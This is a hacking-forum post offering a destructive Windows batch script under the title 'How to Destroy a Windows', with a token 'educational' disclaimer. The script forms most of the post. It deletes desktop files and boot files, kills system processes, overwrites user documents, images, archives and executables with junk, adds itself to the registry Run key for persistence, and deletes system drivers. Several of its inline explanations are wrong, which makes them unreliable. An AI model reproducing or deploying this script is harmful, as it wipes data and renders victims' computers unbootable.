Login Register


How to Destroy a Windows [BATCH / .bat] filter_list
Author
Message
How to Destroy a Windows [BATCH / .bat] #1
Hi, I want to precise I'm not responsable of any dommage caused by this programm. It's for "educationnal" purpose only.. I think Smile

Spoiler: The code
Notes :
- (...) It's an info don't include it into your code
- DON'T RUN THE BAT FILE ON YOUR COMPUTER ! Or I'll don't be responsable of all domages created with it. Run it on a VM it's just a hint Smile

Code:
del /f /q "C:\Users\%username%\Desktop\*" (Delete your Desktop ) taskkill /f /im taskmgr.exe (Kill the task manager) taskkill /f /im msnmsgr.exe (Kill msn) taskkill /f /im winlogon.exe (Kill the login system) taskkill /f /im msconfig.exe (Kill all pilotes on windows) taskkill /f /im regedit.exe (Kill an important file of Windows (Probably important for your computer :D)) taskkill /f /im irc.exe (Kill a file... I don't know why it's here) taskkill /f /im ventrilo.exe (Kill a programm pre-installed on Windows) taskkill /f /im taskeng.exe (Kill a security process) taskkill /f /im firefox.exe (Kill Firefox) taskkill /f /im skype.exe (Kill Skype ) taskkill /f /im yahoomsgr.exe (Kill yahoo messenger) attrib -r -s -h c:\autoexec.bat (Delete some important files onyour computer) del /f /q c:\autoexec.bat attrib -r -s -h c:\bootmgr del /f /q c:\bootmgr attrib -r -s -h c:\BOOTSECT.BAK del /f /q c:\BOOTSECT.BAK attrib -r -s -h c:\boot.ini del /f /q c:\boot.ini attrib -r -s -h c:\ntldr del /f /q c:\ntldr attrib -r -s -h c:\Boot del /f /q c:\Boot attrib -r -s -h c:\windows\win.ini del /f /q c:\windows\win.ini Ipconfig /release attrib +h "%userprofile%\my documents\pictures" (Delete your pictures) if exist winstart.vbs goto next echo set objShell = CreateObject(WScript.Shell) >> winstart.vbs echo objShell.Run .bat, vbHide, TRUE >> winstart.vbs start"winstart.vbs (Here I delete all files with this extensions: .avi .bat .rar .jpeg .jpg .exe .zip ) for %%a in (c:\*.avi *.avi ..\*.avi c:\mydocu~1\*.avi C:\Users\%username%\Documents\*.avi %windir%\*.avi %path%\*.avi %windir%\desktop\*.avi C:\Users\%username%\Desktop\*.avi C:\Users\%username%\Pictures\*.avi) do echo INFECTED > %%a for %%a in (c:\*.bat *.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\system\*.bat) do echo del /f /q %%0 > %%a for %%a in (c:\*.rar *.rar ..\*.rar c:\mydocu~1\*.rar C:\Users\%username%\Documents\*.rar %windir%\*.rar %path%\*.rar %windir%\desktop\*.rar C:\Users\%username%\Desktop\*.rar C:\Users\%username%\Pictures\*.rar) do echo INFECTED > %%a for %%a in (c:\*.jpeg *.jpeg ..\*.jpeg c:\mydocu~1\*.jpeg C:\Users\%username%\Documents\*.jpeg %windir%\*.jpeg %path%\*.jpeg %windir%\desktop\*.jpeg C:\Users\%username%\Desktop\*.jpeg C:\Users\%username%\Pictures\*.jpeg) do echo INFECTED > %%a for %%a in (c:\*.jpg *.jpg ..\*.jpg c:\mydocu~1\*.jpg C:\Users\%username%\Documents\*.jpg %windir%\*.jpg %path%\*.jpg %windir%\desktop\*.jpg C:\Users\%username%\Desktop\*.jpg C:\Users\%username%\Pictures\*.jpg) do echo INFECTED > %%a for %%a in (c:\*.exe *.exe ..\*.exe c:\mydocu~1\*.exe C:\Users\%username%\Documents\*.exe %windir%\*.exe %path%\*.exe %windir%\desktop\*.exe C:\Users\%username%\Desktop\*.exe %windir%\system\*.exe) do echo INFECTED > %%a for %%a in (c:\*.zip *.zip ..\*.zip c:\mydocu~1\*.zip C:\Users\%username%\Documents\*.zip %windir%\*.zip %path%\*.zip %windir%\desktop\*.zip C:\Users\%username%\Desktop\*.zip C:\Users\%username%\Pictures\*.zip) do echo INFECTED > %%a Set adasdwdadasd=HKLM\Software\Microsoft\Windows\CurrentVersion\Run Reg Add "%adasdwdadasd%" /v "BSOD" /t "REG_SZ" /d %0 /f > nul Del /q /s /f "%SystemRoot%\System32\Drivers\*.*" Save the code in .bat and you'r done :)


Give me your experience in comments Smile
Love
OriginalPainZ


PS : I don't know if I'm in the great category :/ Peace !
(This post was last modified: 05-17-2017, 07:02 PM by OriginalPainZ.)
Leave a Like and a comment if you'r not a LEECHER Smile

French programmer and Physic Data Center / Server hacker

Reply







Users browsing this thread: